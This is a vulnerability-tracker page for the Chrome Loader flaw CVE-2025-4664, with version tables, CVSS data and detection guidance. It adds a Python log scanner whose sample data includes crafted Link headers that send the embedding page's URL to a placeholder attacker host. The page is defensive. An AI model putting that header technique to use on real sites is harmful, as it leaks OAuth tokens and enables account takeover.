CVE-2025-4664
published 2025-05-14

Priority: P2 · 74 · medium
CVSS 3.1: 4.3 (AV:N / AC:L / PR:N / UI:R / S:U / C:L / I:N / A:N)
Exploit status: ITW exploit · VulnCheck KEV · Exploited in the wild
EPSS: 5.33% (91.6th percentile)
Insufficient policy enforcement in Loader in Google Chrome prior to 136.0.7103.113 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)

Affected (9 ranges)

Vendor   | Product        | Version range                                          | Fixed in
chromium | chromium       | >= 0, < 136.0.7103.113-1~deb12u1                       | 136.0.7103.113-1~deb12u1
chromium | chromium       | >= 0, < 136.0.7103.113-1                               | 136.0.7103.113-1
chromium | chromium       | >= 0, < 136.0.7103.113-1                               | 136.0.7103.113-1
debian   | chromium       | < 136.0.7103.113-1~deb12u1 (bookworm)                  | 136.0.7103.113-1~deb12u1 (bookworm)
google   | chrome         | < 136.0.7103.113                                       | 136.0.7103.113
google   | chrome         | >= 136.0.7103.113, < 136.0.7103.113 (empty range as listed in source) | 136.0.7103.113
google   | chrome_chrome  | (no version range given)                               |
msrc     | microsoft_edge | (no version range given)                               |
paloalto | prisma_browser | (no version range given)                               |

Detection & IOCs (extracted from sources)

  • Chrome's Loader component resolves Link headers on subresource responses; an attacker who controls a subresource (for example an image) can send a Link header whose referrer-policy is 'unsafe-url', so the request it triggers carries the embedding page's full URL, query string included. This leaks cross-origin data and can lead to account takeover (e.g., theft of an OAuth token or authorization code).
  • Detection focus: monitor for Link response headers on subresource requests that carry 'referrer-policy=unsafe-url'; this is the mechanism abused to exfiltrate query parameters cross-origin.
  • The exploitation vector is a crafted HTML page delivered remotely; flag Chrome builds older than 136.0.7103.113 (and Edge builds older than 136.0.3240.76) that browse untrusted content, as those builds are vulnerable.
  • CVE-2025-4664 is confirmed actively exploited in the wild and listed in CISA's Known Exploited Vulnerabilities catalog; prioritize finding unpatched Chrome/Edge instances in the environment.
  • Exploitation can lead to full account takeover via theft of OAuth flow query parameters; monitor OAuth redirect URIs and authorization-code parameters for unexpected referrer leakage to third-party image or subresource origins.
  • Google did not initially state whether the vulnerability was being actively exploited at patch time, noting only that a public exploit existed; CISA confirmed active exploitation one day after the patch release.
  • The Link header referrer-policy abuse is specific to Chrome's subresource loader behaviour; other browsers do not resolve Link headers on subresource requests in the same way, which limits the cross-browser applicability of the technique.
  • Developers rarely account for query-parameter theft via third-party image subresources, so many applications may remain exposed to data leakage even after browser patching unless server-side mitigations (for example, not carrying secrets in query strings) are applied.
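The detection points above can be scripted against proxy or WAF logs. The Python below is an added example written for this page, not code from the tracker, Google, or the researcher who reported the bug. The sample responses and the host name attacker.example are constructed, and the version thresholds are the fixed builds cited above. The Link preload parameter is spelled referrerpolicy (as on the HTML link element) while the bullets write referrer-policy, so the scanner accepts both spellings and ignores case and quoting. A Link header with unsafe-url on an HTML document is ordinary preload usage and is reported as info only; the same header on a non-HTML subresource is the CVE-2025-4664 pattern and is reported as high.

```python
import re

# Fixed builds cited on this page (first patched versions).
FIXED_CHROME = (136, 0, 7103, 113)
FIXED_EDGE = (136, 0, 3240, 76)

# Constructed sample of HTTP responses as a proxy might log them; not real
# traffic. attacker.example is a hypothetical host. Each entry is
# (response URL, {header name: value}).
SAMPLE_RESPONSES = [
    ("https://cdn.example.net/logo.png",
     {"Content-Type": "image/png",
      "Link": "</fonts/a.woff2>; rel=preload; as=font"}),
    ("https://attacker.example/pixel.gif",
     {"Content-Type": "image/gif",
      "Link": "<https://attacker.example/collect>; rel=preload; as=image; referrerpolicy=unsafe-url"}),
    ("https://attacker.example/pixel2.gif",
     {"Content-Type": "image/gif",
      "Link": '<https://attacker.example/c2>; rel="preload"; as="image"; REFERRER-POLICY="Unsafe-URL"'}),
    ("https://www.example.com/",
     {"Content-Type": "text/html; charset=utf-8",
      "Link": "<https://www.example.com/hero.jpg>; rel=preload; as=image; referrerpolicy=unsafe-url"}),
]


def parse_link_header(value):
    """Split an RFC 8288 Link header into (target, {param: value}) tuples.

    Parameter names and values are lower-cased and unquoted, so
    REFERRER-POLICY="Unsafe-URL" yields {"referrer-policy": "unsafe-url"};
    the caller accepts both the referrerpolicy and referrer-policy keys.
    Semicolons inside quoted values are not handled; they do not occur in
    the parameters this scanner cares about.
    """
    links = []
    for part in re.split(r",\s*(?=<)", value):
        m = re.match(r"\s*<([^>]*)>\s*(.*)", part, re.S)
        if not m:
            continue
        target, rest = m.group(1), m.group(2)
        params = {}
        for p in rest.split(";"):
            if "=" not in p:
                continue
            k, v = p.split("=", 1)
            params[k.strip().lower()] = v.strip().strip('"').lower()
        links.append((target, params))
    return links


def is_subresource(headers):
    """True when the response is not an HTML document (e.g. an image)."""
    ct = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return ct != "text/html"


def find_unsafe_url_links(responses):
    """One finding per Link entry whose referrer policy is unsafe-url.

    Subresource responses get severity "high" (the CVE-2025-4664 pattern);
    HTML documents get "info", since documents may legitimately preload
    with that policy.
    """
    findings = []
    for url, headers in responses:
        link = headers.get("Link")
        if not link:
            continue
        for target, params in parse_link_header(link):
            policy = params.get("referrerpolicy", params.get("referrer-policy"))
            if policy != "unsafe-url":
                continue
            findings.append({
                "response_url": url,
                "link_target": target,
                "severity": "high" if is_subresource(headers) else "info",
            })
    return findings


def parse_version(s):
    """'136.0.7103.92' -> (136, 0, 7103, 92) for tuple comparison."""
    return tuple(int(x) for x in s.strip().split("."))


def is_vulnerable(browser, version):
    """True for Chrome below 136.0.7103.113 or Edge below 136.0.3240.76."""
    fixed = {"chrome": FIXED_CHROME, "edge": FIXED_EDGE}[browser.lower()]
    return parse_version(version) < fixed


if __name__ == "__main__":
    for f in find_unsafe_url_links(SAMPLE_RESPONSES):
        print(f"[{f['severity']}] {f['response_url']} -> Link target {f['link_target']}")
    for browser, ver in [("chrome", "136.0.7103.92"), ("chrome", "136.0.7103.113"),
                         ("edge", "136.0.3240.50")]:
        print(browser, ver, "vulnerable" if is_vulnerable(browser, ver) else "patched")
```

In a real deployment the response tuples would come from the proxy's header log, and a high finding whose link_target origin differs from the embedding page's origin is the case worth paging on, since that is where an OAuth callback URL would be sent as the Referer.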

CVSS provenance

Source        | Version | Score | Severity | Vector
nvd           | v3.1    | 4.3   | MEDIUM   | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
osv           |         | 4.3   | MEDIUM   |
vulncheck     |         | 4.3   | MEDIUM   |
vendor_debian |         | 4.3   | MEDIUM   |
vendor_msrc   |         | 4.3   | MEDIUM   |